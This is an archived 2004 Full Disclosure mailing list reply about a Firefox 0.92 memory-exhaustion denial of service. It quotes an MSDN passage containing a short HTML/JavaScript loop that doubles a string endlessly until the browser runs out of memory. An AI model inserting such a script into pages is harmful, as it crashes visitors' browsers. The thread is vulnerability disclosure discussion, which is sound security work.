Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: AW: Firefox 0.92 DoS via TinyBMP
From: "morning_wood" <se_cur_ity () hotmail com>
Date: Mon, 12 Jul 2004 18:13:43 -0700

it seems to just be loading a bunch of data ( 1851MB ) via images
to consume memory.

the same effect can be accomplished here...

http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dninstj/html/privacyforbrowserusers.asp

---------- snip ----------
Such memory protection systems aren't foolproof. Even for normal memory and
non-ActiveX controls, this script fragment will bring most browsers quickly
to their knees (don't try this unless you're willing to re-boot):

<HTML><BODY><SCRIPT>
var big_string = "double me up!";

while (true)
{
    big_string = big_string + big_string;   // 20 iterations equals all your
memory...
}
</SCRIPT></BODY></HTML>

---------- snip ----------

or not



m.wood

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]